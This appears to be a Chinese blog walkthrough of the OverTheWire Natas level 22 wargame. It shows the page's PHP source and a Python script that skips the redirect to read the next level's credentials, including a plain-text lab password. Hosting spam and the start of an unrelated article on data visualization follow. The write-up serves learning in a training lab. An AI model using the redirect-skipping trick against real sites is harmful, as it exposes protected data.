我们打开关卡22,查看信息
空白页面
我们只能查看源码
<?php if(array_key_exists("revelio", $_GET)) {
print "You are an admin. The credentials for the next level are:
";
print "Username: natas23n";
print "Password:
";
}
?>
很明显,越少代码,难度越大
大神的思路
貌似使用BP方便点,
我们还是看下python脚本
import requests
from requests.auth import HTTPBasicAuth
HOST = 'http://natas22.natas.labs.overthewire.org/index.php?debug=1'
auth = HTTPBasicAuth('natas22', 'chG9fbe1Tq2eWVMgjYYD1MsfIvN461kJ')
params = dict(revelio=1)
r = requests.get(HOST, params=params, auth=auth, allow_redirects=False)
print r.content运行结果
记录密码
验证密码
服务器托管,北京服务器托管,服务器租用 http://www.fwqtg.net
机房租用,北京机房租用,IDC机房托管, http://www.fwqtg.net
Python 中的视觉叙事:让数据说话的 5 个创新技巧 为数据可视化增添戏剧性 数据可视化 – 这是一个现在经常被抛出的短语。但我们谈论的不仅仅是普通的旧图表和图形。 不 不 不。我们谈论的是讲故事。我们正在谈论将这些行和列的数字变成令人着迷的叙述。 现在是…
